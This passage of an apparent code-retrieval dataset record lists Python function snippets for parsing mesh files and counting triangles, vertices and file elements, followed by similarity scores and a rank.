= line.split(':')\n assert int(fields[0]) == i-1, 'Point indices not consecutive'\n\n #Split the three floats\n xyz = fields[1].split()\n\n x = float(xyz[0])\n y = float(xyz[1])\n z = float(xyz[2])\n\n points.append([x, y])\n values.append(z)\n\n\n k = i\n while keyword == 'POLYS':\n line = lines[i].strip()\n i += 1\n\n if line == 'END':\n keyword = line\n break\n\n\n fields = line.split(':')\n assert int(fields[0]) == i-k, 'Poly indices not consecutive'\n\n #Split the three indices\n vvv = fields[1].split()\n\n i0 = int(vvv[0])-1\n i1 = int(vvv[1])-1\n i2 = int(vvv[2])-1\n\n #Check for and exclude degenerate areas\n x0 = points[i0][0]\n y0 = points[i0][1]\n x1 = points[i1][0]\n y1 = points[i1][1]\n x2 = points[i2][0]\n y2 = points[i2][1]\n\n area = abs((x1*y0-x0*y1)+(x2*y1-x1*y2)+(x0*y2-x2*y0))/2\n if area > 0:\n\n #Ensure that points are arranged in counter clock-wise order\n v0 = [x1-x0, y1-y0]\n v1 = [x2-x1, y2-y1]\n v2 = [x0-x2, y0-y2]\n\n a0 = anglediff(v1, v0)\n a1 = anglediff(v2, v1)\n a2 = anglediff(v0, v2)\n\n\n if a0 < pi and a1 < pi and a2 < pi:\n #all is well\n j0 = i0\n j1 = i1\n j2 = i2\n else:\n #Swap two vertices\n j0 = i1\n j1 = i0\n j2 = i2\n\n triangles.append([j0, j1, j2])\n ##vertex_values.append([values[j0], values[j1], values[j2]])\n else:\n offending +=1\n\n log.critical('Removed %d offending triangles out of %d'\n % (offending, len(lines)))\n 
return points, triangles, values", "def __len__(self) -> int:\n import h5py\n\n with h5py.File(\n os.path.join(self.root, self.data_dir, self.img_file_name), \"r\"\n ) as f:\n num_datapoints: int = f[self.split][\"pv_log\"].shape[0]\n\n return num_datapoints", "def get_triangles( self, N ):\n\n # store N as an instance variable\n self.N = N\n\n # initialize array to store locations of points for all triangles in the\n # tessellation sequence\n self.triangles = np.zeros( ( self.N, 3, 2 ) )\n\n # define points of the first triangle in the tessellation sequence\n point_c = np.array( [ 0, 0 ] )\n point_b = self.a * np.array( [ np.cos( self.C ), np.sin( self.C ) ] )\n point_a = np.array( [ self.b, 0 ] )\n\n # stack the points into a single array of shape (3, 2 )\n triangle = np.vstack( [ point_c, point_b, point_a ] )\n\n # loop over the number of triangles in the sequence\n for i in range( self.N ):\n\n # store the points of the i-th triangle in the array\n self.triangles[ i ] = triangle\n\n # compute the next triangle in the tessellation sequence\n triangle = self.next_triangle( triangle = triangle )\n\n # shift the next triangle in the tessellation sequence such that its\n # point C is in the same location as point B of the previous triangle\n triangle += ( self.triangles[ i - 1, 1 ] - self.triangles[ 0, 0 ] )", "def so_data_statistics(data_file):\n with open(data_file, \"r\") as f:\n data = json.load(f)\n\n answer_to_num_questions = collections.Counter()\n comment_to_num_questions = collections.Counter()\n num_comments = 0\n num_answers = 0\n num_questions = len(data)\n\n for q in data:\n q = json.loads(q)\n q_comments = 0\n q_comments += len(q[\"comments\"])\n q_answers = len(q[\"answers\"])\n for a in q[\"answers\"]:\n q_comments += len(a[\"comments\"])\n\n answer_to_num_questions[q_answers] += 1\n comment_to_num_questions[q_comments] += 1\n\n num_comments += q_comments\n num_answers += q_answers\n\n print \"Num comments: {0}, Num answers: {1}, Num_questions: {2}\".format(\n num_comments, num_answers, num_questions)\n print \"-\" * 10\n print \"Answers map: \", answer_to_num_questions\n print \"Comments map: \", comment_to_num_questions\n\n return num_comments, num_answers, num_questions, answer_to_num_questions, \\\n comment_to_num_questions", "def numberFiles(self):\n with open(self.inputfile) as fin:\n for n, _ in enumerate(fin, start=1): pass\n self.n = n\n return self.n", "def get_vertices_num(self):\n return self.coords.shape[0]", "def strang_mesh(filename):\n\n from math import pi\n from anuga.utilities.numerical_tools import anglediff\n\n\n fid = open(filename)\n points = [] # List of x, y coordinates\n triangles = [] # List of vertex ids as listed in the file\n\n for line in fid.readlines():\n fields = line.split()\n if len(fields) == 2:\n # we are reading vertex coordinates\n points.append([float(fields[0]), float(fields[1])])\n elif len(fields) == 3:\n # we are reading triangle point id's (format ae+b)\n triangles.append([int(float(fields[0]))-1,\n int(float(fields[1]))-1,\n int(float(fields[2]))-1])\n else:\n raise Excetion('wrong format in %s' % filename)\n\n elements = [] #Final list of elements\n\n for t in triangles:\n #Get vertex coordinates\n v0 = t[0]\n v1 = t[1]\n v2 = t[2]\n\n x0 = points[v0][0]\n y0 = points[v0][1]\n x1 = points[v1][0]\n y1 = points[v1][1]\n x2 = points[v2][0]\n y2 = points[v2][1]\n\n #Check that points are arranged in counter clock-wise order\n vec0 = [x1-x0, y1-y0]\n vec1 = [x2-x1, y2-y1]\n vec2 = [x0-x2, y0-y2]\n\n a0 = anglediff(vec1, vec0)\n a1 = 
anglediff(vec2, vec1)\n a2 = anglediff(vec0, vec2)\n\n if a0 < pi and a1 < pi and a2 < pi:\n elements.append([v0, v1, v2])\n else:\n elements.append([v0, v2, v1])\n\n return points, elements", "def vertex_count(self):\n return len(self._outgoing)", "def n_file_elements(cls):\n \n return randint(1, (3 * Root.size))", "def contig_count(contig):\n return sum([1 for line in open(contig, 'rU').readlines() if line.startswith('>')])", "def load_lengths(filename, return_base=False):\n data = pd.read_csv(filename, sep=\"\\t\", comment=\"#\", header=None)\n data = data.as_matrix()\n _, idx, lengths = np.unique(data[:, 0], return_counts=True,\n return_index=True)\n if return_base:\n return lengths[idx.argsort()], data[0, 3]\n else:\n return lengths[idx.argsort()]", "def __init__(self, file_path):\n\n # Comments\n # mtllib mtl_name\n # o object_name\n # v x y z\n # vt u v\n # vn x y z\n # f v0/t0/n0 v1/t1/n1 v2/t2/n2\n\n print('loading mesh \"%s\"' % file_path)\n mesh_file = open(file_path, 'r')\n\n verts = []\n texs = []\n normals = []\n faces = []\n\n # For each line of the input file\n for line in mesh_file:\n line = line.rstrip(' \\r\\n')\n\n # Skip comments\n if line.startswith('#') or line == '':\n continue\n\n tokens = line.split(' ')\n tokens = map(lambda t: t.strip(' '), tokens)\n tokens = list(filter(lambda t: t != '', tokens))\n\n prefix = tokens[0]\n tokens = tokens[1:]\n\n if prefix == 'v':\n vert = list(map(lambda v: float(v), tokens))\n verts.append(vert)\n\n if prefix == 'vt':\n tc = list(map(lambda v: float(v), tokens))\n texs.append(tc)\n\n if prefix == 'vn':\n normal = list(map(lambda v: float(v), tokens))\n normals.append(normal)\n\n if prefix == 'f':\n assert len(tokens) == 3, \"only triangle faces are supported\"\n\n face = []\n for token in tokens:\n indices = list(map(lambda idx: int(idx), token.split('/')))\n face.append(indices)\n\n faces.append(face)\n\n mesh_file.close()\n\n self.num_faces = len(faces)\n\n print('num verts=%d' % len(verts))\n print('num_faces=%d' % self.num_faces)\n\n # Create numpy arrays to store the vertex data\n list_verts = np.zeros(shape=(3 * self.num_faces, 3), dtype=np.float32)\n list_texcs = np.zeros(shape=3 * 2 * self.num_faces, dtype=np.float32)\n list_norms = np.zeros(shape=3 * 3 * self.num_faces, dtype=np.float32)\n\n cur_vert_idx = 0\n\n # For each triangle\n for face in faces:\n # For each triplet of indices\n for triplet in face:\n v_idx, t_idx, n_idx = triplet\n\n # Note: OBJ uses 1-based indexing\n vert = verts[v_idx-1]\n texc = texs[t_idx-1]\n normal = normals[n_idx-1]\n\n list_verts[cur_vert_idx, :] = vert\n list_texcs[2*cur_vert_idx:2*(cur_vert_idx+1)] = texc\n list_norms[3*cur_vert_idx:3*cur_vert_idx+3] = normal\n\n cur_vert_idx += 1\n\n # Re-center the object so that y=0 is at the base,\n # and the object is centered in x and z\n x_coords = list_verts[:, 0]\n z_coords = list_verts[:, 2]\n min_y = list_verts[:, 1].min()\n mean_x = (x_coords.min() + x_coords.max()) / 2\n mean_z = (z_coords.min() + z_coords.max()) / 2\n list_verts[:, 1] -= min_y\n list_verts[:, 0] -= mean_x\n list_verts[:, 2] -= mean_z\n\n # Compute the object extents after centering\n x_coords = list_verts[:, 0]\n y_coords = list_verts[:, 1]\n z_coords = list_verts[:, 2]\n self.y_max = y_coords.max()\n\n # Create a vertex list to be used for rendering\n self.vlist = pyglet.graphics.vertex_list(\n 3 * self.num_faces,\n ('v3f', list_verts.reshape(-1)),\n ('t2f', list_texcs),\n ('n3f', list_norms)\n )\n\n # Load the texture associated with this mesh\n file_name = 
os.path.split(file_path)[-1]\n tex_name = file_name.split('.')[0]\n tex_path = get_file_path('textures', tex_name, 'png')\n self.texture = load_texture(tex_path)", "def count_elements(path):\n count = 0\n with open(path, 'r') as f:\n groups = f.read().split('\\n\\n')\n for idx in range(len(groups)):\n word = groups[idx].split('\\n')\n no_of_ele = len(word)\n for i in range(no_of_ele-1):\n word[0] = word[0]+word[i+1]\n count += len(''.join(set(word[0])))\n return count" ]
[ "0.7772032", "0.68836695", "0.6398507", "0.6369426", "0.6362666", "0.6353974", "0.6323438", "0.6275137", "0.6170703", "0.6165812", "0.6144632", "0.613628", "0.61066425", "0.6011404", "0.59843576", "0.59520715", "0.5947087", "0.594126", "0.5935394", "0.59270984", "0.59270984", "0.5926359", "0.58514494", "0.58492893", "0.5836909", "0.5831675", "0.5831274", "0.5829534", "0.5826601", "0.5811575", "0.5778336", "0.57675093", "0.57538956", "0.5736303", "0.57076925", "0.56999564", "0.5698479", "0.5696968", "0.5686956", "0.56687146", "0.56588656", "0.5653763", "0.56502515", "0.56390417", "0.56024665", "0.55870193", "0.55844635", "0.5567423", "0.55649316", "0.55533016", "0.55512464", "0.5543442", "0.5538092", "0.5535526", "0.5528358", "0.55240124", "0.55178404", "0.5515604", "0.5512616", "0.55055326", "0.5478094", "0.5473247", "0.5468789", "0.54656523", "0.5454213", "0.5453736", "0.5441365", "0.5434383", "0.54289347", "0.5426822", "0.54233533", "0.5419709", "0.541386", "0.5409464", "0.54024774", "0.54002786", "0.53972715", "0.5392659", "0.5391981", "0.53919524", "0.53839743", "0.53838426", "0.538381", "0.5370671", "0.5369772", "0.5365828", "0.5359394", "0.53585804", "0.5356658", "0.5348002", "0.5342111", "0.53373665", "0.53328633", "0.5328268", "0.53233385", "0.5323326", "0.53231263", "0.5319525", "0.5303401", "0.5298637" ]
0.64086694
2
This function will return data about the number of triangles on each surface in a file inputs
def get_triangles_per_surface(my_core, entity_ranges):

    t_p_s = {}
    for surface in entity_ranges['Surfaces']:
        t_p_s[surface] = my_core.get_entities_by_type(
            surface, types.MBTRI).size()
    return t_p_s
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def count_triangles(self, file):\n self.nibble(80)\n return struct.unpack(\"@i\", self.nibble(4))[0]", "def get_num_vertices(triangles):\n return numpy.amax(numpy.reshape(triangles, -1)) + 1", "def count_cells(fpath):\n cells = []\n for i in range(40):\n fname = f\"{fpath}/Mesh2d_{i}.vtu\"\n if not os.path.exists(fname):\n print(f\"File {fname} does not exist.\")\n break\n mesh = meshio.read(fname)\n for cell_block in mesh.cells:\n if cell_block.type in (\"triangle\"):\n num_cells = len(cell_block)\n print(f\"{i:2d}: {num_cells:6d} elements, {len(mesh.points):6d} vertices\")\n cells.append(num_cells)\n continue\n return cells", "def num_data_lines(filepath):\n\tif not file_exists(filepath):\n\t\treturn -1\n\tcount = 0\n\twith open(filepath, 'r') as f:\n\t\twhile read_floats(f):\n\t\t\tcount += 1\n\tf.close()\n\treturn count", "def countSamples(filename):\n with open(filename, \"r\") as f:\n line = f.readline().split(\"\\t\")\n return len(line) - 2", "def _get_las_npoints(fpath):\n with laspy.file.File(fpath) as f:\n return f.header.count", "def get_triangles_per_vertex(my_core, native_ranges):\n\n t_p_v_data = []\n tri_dimension = 2\n for vertex in native_ranges[types.MBVERTEX]:\n t_p_v_data.append(my_core.get_adjacencies(vertex, tri_dimension).size())\n return np.array(t_p_v_data)", "def test_triangle_count_05(self):\n body = {\"direction\": \"IN\", \"degree\": -1}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_in': 13, 'vertices_in': 9, 'triangles': 2}\n else:\n assert 0", "def test_triangle_count_08(self):\n body = {\"direction\": \"IN\", \"degree\": 1}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_in': 13, 'vertices_in': 9, 'triangles': 0}\n else:\n assert 0", "def test_triangle_count_04(self):\n body = {\"direction\": \"OUT\"}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_out': 13, 'vertices_out': 7, 'triangles': 2}\n else:\n assert 0", "def test_triangle_count_06(self):\n body = {\"direction\": \"OUT\", \"degree\": -1}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_out': 13, 'vertices_out': 7, 'triangles': 2}\n else:\n assert 0", "def countDataSize(self,filename):\n \n try:\n d = h5py.File(filename,'r')\n except:\n print(filename)\n return \n\n N = 0\n scan_edges = d['level2/Statistics/scan_edges'][:]\n for (start,end) in scan_edges:\n N += (end-start)//self.offsetLen * self.offsetLen\n d.close()\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def countDataSize(self,filename):\n \n d = h5py.File(filename,'r')\n features = d['spectrometer/features'][:]\n select = self.selectData(features.astype(float), self.ifeature, d)\n N = len(features[select])\n d.close()\n\n N = (N//self.offsetLen) * self.offsetLen\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def data_info(data):\n filename = data[\"filename\"]\n X_var = 
data[\"X_var\"]\n Y_var = data[\"Y_var\"]\n X,Y = read_file(filename,X_var,Y_var)\n input_dim = len(X_var)\n output_dim = len(Y_var)\n return X,Y,input_dim,output_dim", "def count_aux(self, infile):\n n_aux = 0\n n_tokens = 0\n dgs_in = self._file_handler.file_to_dg_list(infile)\n for dg in dgs_in:\n n_tokens += len(dg)\n transform = VGtransformer(dg, dep_style=self._dep_style)\n transform.transform()\n n_aux += transform.tot_aux\n return n_aux, n_tokens, len(dgs_in)", "def read_datafile(shower_name):\n\twith open(datafile_dir+'datafile_'+shower_name) as file:\n\t\tamplitudes = [float(line) for line in file]\n\tcount = [x+1 for x in range(len(amplitudes))[::-1]]\n\treturn amplitudes, count", "def get_array_size():\n tg_file = 'NA_CAS_gauges.txt'\n lines = open(tg_file).readlines()\n tg_nbr = len(lines)\n return tg_nbr", "def __len__(self):\n return self._num_samples_per_file * len(self._files) // self._world_size", "def create_1d_coil_geometry(division, filename, directory):\n os.chdir(directory)\n npoints = division + 1\n length_array = np.zeros((npoints, 2))\n current_length = 0\n array = np.loadtxt(filename)\n for i in range(1, npoints):\n current_length += ((array[i, 1] - array[i - 1, 1]) ** 2 + (array[i, 2] - array[i - 1, 2]) ** 2 +\n (array[i, 3] - array[i - 1, 3]) ** 2) ** 0.5\n length_array[i - 1, 0] = i\n length_array[i, 1] = current_length\n length_array[npoints - 1, 0] = npoints\n return length_array", "def load_data():\n data = []\n with euler.Resource('triangle.txt') as datafile:\n for line in datafile.readlines():\n data.insert(0, map(int, line.strip().split()))\n return data", "def test_triangle_count_07(self):\n body = {\"direction\": \"OUT\", \"degree\": 1}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_out': 13, 'vertices_out': 7, 'triangles': 0}\n else:\n assert 0", "def read_input(filename):\n with open(filename, 'r') as f:\n (N) = map(int, next(f).split())\n def parse_line(line):\n l = line.split()\n h = 0 if l[0] == 'H' else 1\n n = int(l[1])\n return [h, l[2:]]\n\n photos = transform_strings([parse_line(line) for line in f])\n return (len(photos), photos)", "def get_edge_lengths(points: np.ndarray, triangles: np.ndarray) -> np.ndarray:\n edges, _ = get_edges(triangles)\n return np.linalg.norm(np.diff(points[edges], axis=1), axis=2).squeeze()", "def dimension(self):\r\n a = 0\r\n for x in self.faces():\r\n if (len(x) > a):\r\n a = len(x) \r\n return a-1", "def count_timepoints(sc, session, files):\n tuples = zip(range(len(files)), files)\n files_sc = sc.parallelize(tuples)\n\n def count_planes(kv):\n index, path2 = kv\n try:\n from ScanImageTiffReader import ScanImageTiffReader\n img = ScanImageTiffReader(path2).data()\n except Exception:\n import tifffile\n img = tifffile.imread(path2)\n return img.shape[0]\n\n data2 = files_sc.map(count_planes).collect()\n frame_numbers = np.array(data2)\n vol_numbers = frame_numbers / len(session.fieldMask)\n return vol_numbers.astype(int)", "def countsubcatchments(inputfilename=FileSettings.settingsdict['inputfilename']):\r\n global count\r\n with open(inputfilename, 'r') as swmmput:\r\n contents = swmmput.readlines()\r\n count = len(contents)\r\n return(count)", "def read_off_size(path):\n try:\n with open(path, 'r') as file:\n lines = file.readlines()\n if lines[0] != 'OFF\\n':\n print(path, 'Error: is not an .off file')\n num_vertices, num_faces = tuple(lines[1].split()[:2])\n return 
int(num_vertices), int(num_faces)\n except IOError:\n print('Error: Failed reading file:', path)", "def num_quadrature_points(self) -> int:", "def findTriangles(p):\n triangleCount = 0\n for a in range(3, p//3 + 1):\n for b in range(a+1, p//2):\n c = p - (a+b)\n if (a**2 + b**2) == c**2:\n triangleCount += 1\n return triangleCount", "def get_dimensions ( file_in, separator ) :\n try :\n logger.info ( \"Extract dimensions from xyz file \" + str(file_in) ) \n d = {}\n first_row = True\n d[NOPS] = 0\n file = open(file_in, 'r')\n for line in file :\n d[NOPS] = d[NOPS] + 1\n l = line.rstrip().split(separator)\n x = float(l[0])\n y = float(l[1])\n z = float(l[2])\n if first_row :\n d[MINX] = x\n d[MAXX] = x\n d[MINY] = y\n d[MAXY] = y\n d[MINZ] = z\n d[MAXZ] = z\n first_row = False\n else :\n if x < d[MINX] :\n d[MINX] = x\n if x > d[MAXX] :\n d[MAXX] = x \n if y < d[MINY] :\n d[MINY] = y\n if y > d[MAXY] :\n d[MAXY] = y \n if z < d[MINZ] :\n d[MINZ] = z\n if z > d[MAXZ] :\n d[MAXZ] = z \n file.close() \n logger.info ('Now return')\n return d\n except Exception, err:\n logger.critical(\"Extract dimensions from xyz file failed: ERROR: %s\\n\" % str(err))\n raise", "def reader(filename,only_length=False):\n print(\"Counting lines in file %s\"%filename)\n total_lines=0\n for n,line in enumerate(open(filename,\"r\")):\n total_lines+=1\n \n if only_length:\n return total_lines\n \n X,Y,Z,W,J=[np.zeros(total_lines) for _ in range(5)]\n \n for n, line in enumerate(open(filename, 'r')):\n if n%1000000==0:\n print(\"Reading line %d of %d from file %s\" %(n,total_lines,filename))\n split_line=np.array(line.split(\" \"), dtype=float) \n X[n]=split_line[0];\n Y[n]=split_line[1];\n Z[n]=split_line[2];\n W[n]=split_line[3];\n J[n]=int(split_line[4]);\n return X,Y,Z,W,J", "def total_number():\r\n total_number = 0\r\n file_read = read_file()\r\n for key in file_read:\r\n total_number = total_number + len(file_read[key])\r\n return total_number", "def calc_side_lengths(triangles):\n first_vec = [2, 0, 1]\n second_vec = [1, 2, 0]\n sides = triangles[:, first_vec] - triangles[:, second_vec]\n lengths = np.sqrt(np.sum(sides**2, axis=2))\n return lengths", "def numverts(self):\n return self._numvertstotal", "def readGR3File(inputFilename):\n print 'Reading ' + inputFilename + ' ...'\n infile = open(inputFilename, 'r')\n description = infile.readline().strip() # remove leading/trailing whitespace\n tmpStr = infile.readline()\n nTriangles, nNodes = (int(s) for s in tmpStr.split())\n print ' nTriangles={0:d} nNodes={1:d}'.format(nTriangles, nNodes)\n\n # nodes\n nodeArray = readNodeBlock(infile, nNodes)\n nodenum = np.array(nodeArray[:, 0].flatten(), dtype=int)\n nodexyz = np.zeros((nNodes, 3))\n nodexyz[:, :2] = nodeArray[:, 1:3]\n nodalValues = nodeArray[:, 3]\n\n print ' Nodal values min={0:g} max={1:g}'.format(min(nodalValues), max(nodalValues))\n\n # triangular elements\n triArray = readElemBlock(infile, nTriangles)\n\n trinum = triArray[:, 0].flatten()\n tritype = triArray[0, 1]\n trinodes = triArray[:, -3:] - 1 # three last columns, 0-based indexing\n #triangles = meshElements(trinodes,trinum,tritype)\n\n x = nodexyz[:, 0]\n y = nodexyz[:, 1]\n\n tmpStr = infile.readline()\n boundaries = []\n if len(tmpStr) > 0:\n # boundary information, if not end of file\n nOpenBndSegments = int(tmpStr.split()[0])\n nOpenBndNodesTot = int(infile.readline().split()[0])\n print ' nOpenBndSegments={0:d} nOpenBndNodesTot={1:d}'.format(nOpenBndSegments, nOpenBndNodesTot)\n for iBnd in range(nOpenBndSegments):\n bndHeader = 
infile.readline().split()\n nBndNodes = int(bndHeader[0])\n tag = bndHeader[-1]\n if tag.isdigit():\n tag = 'open' + tag\n print ' open bnd {0:d} {1:s}: {2:d} nodes'.format(iBnd + 1, tag, nBndNodes)\n tmpList = []\n for iN in range(nBndNodes):\n tmpList.append(int(infile.readline()))\n nodes = np.array(tmpList, dtype=int) - 1\n boundaries.append(meshContainer.meshBoundary('open', tag, nodes))\n nLandBndSegments = int(infile.readline().split()[0])\n nLandBndNodesTot = int(infile.readline().split()[0])\n landBndTags = range(\n nOpenBndSegments + 1,\n nOpenBndSegments + nLandBndSegments + 1)\n print ' nLandBndSegments={0:d} nLandBndNodesTot={1:d}'.format(nLandBndSegments, nLandBndNodesTot)\n for iBnd in range(nLandBndSegments):\n bndHeader = infile.readline().split()\n nBndNodes = int(bndHeader[0])\n try:\n landType = int(bndHeader[1])\n except:\n print \"\"\"Land boundary type missing in gr3 file. Add 0/1 (land/island) after number of nodes in each land boudary, e.g.\n 1002 = Total number of closed boundary nodes\n 501 0 = Number of nodes in closed boundary 1\"\"\"\n raise Exception(\n 'Could not parse land boundary type (0/1 - land/island)\\n')\n landType = 'island' if landType == 1 else 'land'\n tag = landType + bndHeader[-1]\n print ' land bnd {0:d} {1:s}: {2:d} nodes'.format(iBnd + 1, tag, nBndNodes)\n tmpList = []\n for iN in range(nBndNodes):\n tmpList.append(int(infile.readline()))\n #tmpList = fromfile(infile,dtype=int,count=nBndNodes,sep=' ')\n nodes = np.array(tmpList, dtype=int) - 1\n boundaries.append(meshContainer.meshBoundary(landType, tag, nodes))\n\n infile.close()\n\n # for better interpolation, round coordinates to 1e-4\n nDig = 4\n x = np.round(x, nDig)\n y = np.round(y, nDig)\n\n return x, y, nodalValues, trinodes, boundaries, description", "def file_read(file_name):\n \n #open specified file in read mode\n in_file = open(file_name, \"r\")\n \n #create data lists\n sp_length_v3 = []\n sp_period_v3 = [] \n\n #save header to string and split into list\n header_string = in_file.readline()\n header_v3 = header_string.split()\n \n #save revelent data to respective lists\n for line in in_file:\n values = line.split()\n sp_length_v3.append(float(values[1]))\n sp_period_v3.append(float(values[2]))\n \n #close the file\n in_file.close()\n \n #return 3D lists of lists containing data\n ans = [sp_length_v3, sp_period_v3, header_v3]\n \n return ans", "def from_polyfile(name):\n\n from anuga.utilities.numerical_tools import anglediff\n from math import pi\n import os.path\n root, ext = os.path.splitext(name)\n\n if ext == 'poly':\n filename = name\n else:\n filename = name + '.poly'\n\n\n fid = open(filename)\n\n points = [] #x, y\n values = [] #z\n ##vertex_values = [] #Repeated z\n triangles = [] #v0, v1, v2\n\n lines = fid.readlines()\n\n keyword = lines[0].strip()\n msg = 'First line in .poly file must contain the keyword: POINTS'\n assert keyword == 'POINTS', msg\n\n offending = 0\n i = 1\n while keyword == 'POINTS':\n line = lines[i].strip()\n i += 1\n\n if line == 'POLYS':\n keyword = line\n break\n\n fields = line.split(':')\n assert int(fields[0]) == i-1, 'Point indices not consecutive'\n\n #Split the three floats\n xyz = fields[1].split()\n\n x = float(xyz[0])\n y = float(xyz[1])\n z = float(xyz[2])\n\n points.append([x, y])\n values.append(z)\n\n\n k = i\n while keyword == 'POLYS':\n line = lines[i].strip()\n i += 1\n\n if line == 'END':\n keyword = line\n break\n\n\n fields = line.split(':')\n assert int(fields[0]) == i-k, 'Poly indices not consecutive'\n\n #Split the 
three indices\n vvv = fields[1].split()\n\n i0 = int(vvv[0])-1\n i1 = int(vvv[1])-1\n i2 = int(vvv[2])-1\n\n #Check for and exclude degenerate areas\n x0 = points[i0][0]\n y0 = points[i0][1]\n x1 = points[i1][0]\n y1 = points[i1][1]\n x2 = points[i2][0]\n y2 = points[i2][1]\n\n area = abs((x1*y0-x0*y1)+(x2*y1-x1*y2)+(x0*y2-x2*y0))/2\n if area > 0:\n\n #Ensure that points are arranged in counter clock-wise order\n v0 = [x1-x0, y1-y0]\n v1 = [x2-x1, y2-y1]\n v2 = [x0-x2, y0-y2]\n\n a0 = anglediff(v1, v0)\n a1 = anglediff(v2, v1)\n a2 = anglediff(v0, v2)\n\n\n if a0 < pi and a1 < pi and a2 < pi:\n #all is well\n j0 = i0\n j1 = i1\n j2 = i2\n else:\n #Swap two vertices\n j0 = i1\n j1 = i0\n j2 = i2\n\n triangles.append([j0, j1, j2])\n ##vertex_values.append([values[j0], values[j1], values[j2]])\n else:\n offending +=1\n\n log.critical('Removed %d offending triangles out of %d'\n % (offending, len(lines)))\n return points, triangles, values", "def n_file_elements(cls):\n \n return randint(1, (3 * Root.size))", "def gather_counts(directory):\n counts_un = defaultdict(int)\n counts_bi = defaultdict(int)\n counts_tri = defaultdict(int)\n prev_prev = \"<s>\"\n prev = \"<s>\"\n for filename in os.listdir(f\"./{directory}\"):\n if \".DS_Store\" in filename:\n continue\n with open(f\"./{directory}/{filename}\", \"r\") as f:\n for line in f:\n line = line.strip()\n if len(line) == 0:\n continue\n counts_un[line+\"\\n\"] += 1\n counts_bi[prev+\"\\n\"+line+\"\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\"+line+\"\\n\"] += 1\n prev_prev = prev\n prev = line\n counts_un[\"</s>\\n\"] += 2\n counts_bi[\"</s>\\n</s>\\n\"] += 1\n counts_bi[prev+\"\\n\"+\"</s>\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\" + \"</s>\\n\"] += 1\n counts_tri[prev+\"\\n</s>\\n</s>\\n\"] += 1\n return counts_un, counts_bi, counts_tri", "def get_triangle_count(remote, objectid):\n cmd1 = mmapi.StoredCommands()\n key1 = cmd1.AppendSceneCommand_GetTriangleCount(objectid)\n remote.runCommand(cmd1)\n result_val = mmapi.any_result()\n cmd1.GetSceneCommandResult_GetTriangleCount(key1, result_val)\n return result_val.i", "def get_dimensions(self):\r\n x = []\r\n y = []\r\n z = []\r\n for i in self.verts:\r\n x.append(i[0])\r\n y.append(i[1])\r\n z.append(i[2])\r\n\r\n x.append(abs(min(x)))\r\n y.append(abs(min(y)))\r\n z.append(abs(min(z)))\r\n\r\n return max(x), max(y), max(z)", "def get_triangles( self, N ):\n\n # store N as an instance variable\n self.N = N\n\n # initialize array to store locations of points for all triangles in the\n # tessellation sequence\n self.triangles = np.zeros( ( self.N, 3, 2 ) )\n\n # define points of the first triangle in the tessellation sequence\n point_c = np.array( [ 0, 0 ] )\n point_b = self.a * np.array( [ np.cos( self.C ), np.sin( self.C ) ] )\n point_a = np.array( [ self.b, 0 ] )\n\n # stack the points into a single array of shape (3, 2 )\n triangle = np.vstack( [ point_c, point_b, point_a ] )\n\n # loop over the number of triangles in the sequence\n for i in range( self.N ):\n\n # store the points of the i-th triangle in the array\n self.triangles[ i ] = triangle\n\n # compute the next triangle in the tessellation sequence\n triangle = self.next_triangle( triangle = triangle )\n\n # shift the next triangle in the tessellation sequence such that its\n # point C is in the same location as point B of the previous triangle\n triangle += ( self.triangles[ i - 1, 1 ] - self.triangles[ 0, 0 ] )", "def std_triangles_count(graph):\n if nx.is_directed(graph):\n raise Exception(\"Graph is not 
undirected\")\n\n return sum(nx.triangles(graph).values()) // 3", "def getNbins(self,axis,includeTotalBin = True):\n\n\t\tif axis == \"f\":\n\t\t\tnCells = 1 if self.nCells == 0 else self.nCells\n\t\t\treturn nCells\n\n\t\tif axis == \"i\":\n\t\t\treturn self.meshInfo[1]\n\n\t\tif axis == \"j\":\n\t\t\treturn self.meshInfo[2]\n\n\t\tif axis == \"k\":\n\t\t\treturn self.meshInfo[3]\n\n\t\tif axis == \"d\":\n\t\t\tnDir = 1 if self.nDir == 0 else self.nDir\n\t\t\treturn nDir\n\n\t\tif axis == \"u\":\n\t\t\tnUsr = 1 if self.nUsr == 0 else self.nUsr\n\t\t\tnUsr = nUsr - 1 if self.usrTC == \"t\" and not includeTotalBin else nUsr\n\t\t\treturn nUsr\n\n\t\tif axis == \"s\":\n\t\t\tnSeg = 1 if self.nSeg == 0 else self.nSeg\n\t\t\tnSeg = nSeg - 1 if self.segTC == \"t\" and not includeTotalBin else nSeg\n\t\t\treturn nSeg\n\n\t\tif axis == \"m\":\n\t\t\tnMul = 1 if self.nMul == 0 else self.nMul\n\t\t\tnMul = nMul - 1 if self.mulTC == \"t\" and not includeTotalBin else nMul\n\t\t\treturn nMul\n\n\t\tif axis == \"c\":\n\t\t\tnCos = 1 if self.nCos == 0 else self.nCos\n\t\t\tnCos = nCos - 1 if self.cosTC == \"t\" and not includeTotalBin else nCos\n\t\t\treturn nCos\n\n\t\tif axis == \"e\":\n\t\t\tnErg = 1 if self.nErg == 0 else self.nErg\n\t\t\tnErg = nErg - 1 if self.ergTC == \"t\" and not includeTotalBin else nErg\n\t\t\treturn nErg\n\n\t\tif axis == \"t\":\n\t\t\tnTim = 1 if self.nTim == 0 else 